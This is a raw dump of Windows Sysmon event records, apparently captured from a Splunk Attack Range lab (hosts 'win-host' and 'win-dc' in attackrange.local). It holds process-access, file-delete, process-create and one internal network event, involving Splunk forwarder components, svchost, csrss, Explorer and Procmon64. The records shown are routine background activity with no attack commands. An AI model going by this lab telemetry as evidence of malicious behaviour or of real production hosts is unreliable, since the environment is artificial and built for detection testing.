11:00:49.918{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-13E1-6216-A404-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13E1-6216-A404-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.920{4F8D34B0-13E1-6216-A404-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000218426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.653{4F8D34B0-13E1-6216-A304-000000003902}19041612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.434{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ABA9D7E07284B98F5460F69ACF51468,SHA256=FCF4B16B11BFAAE03C0A82922618B98F4092E0687C1D719D5898B8D5A6964F86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.289{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE999AA0C641E7EF84B28C99648BFFD,SHA256=EC83D346D0A830F2072EF5E766C9F1B22BE760E6E3A2FD99044A4C3176D01FEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13E1-6216-A304-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-13E1-6216-A304-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.403{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13E1-6216-A304-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.404{4F8D34B0-13E1-6216-A304-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.089{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.089{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.089{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.089{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.089{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.089{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.088{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:49.067{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000218443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:48.680{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51459-false10.0.1.12-8000- 23542300x8000000000000000218442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:50.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72E56C1254CD4CB63E230072F1B12682,SHA256=9DD57C6E6866F0A5C5990BCFD0BE97873A8D7AD94FABD71338C9E84174391953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:50.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46D588684C750503721479D1C5F72D03,SHA256=728F320B63C1A730BDBC04964320F1A0BFD4D5F6100D18FE644B4D99A50B9095,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:50.312{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 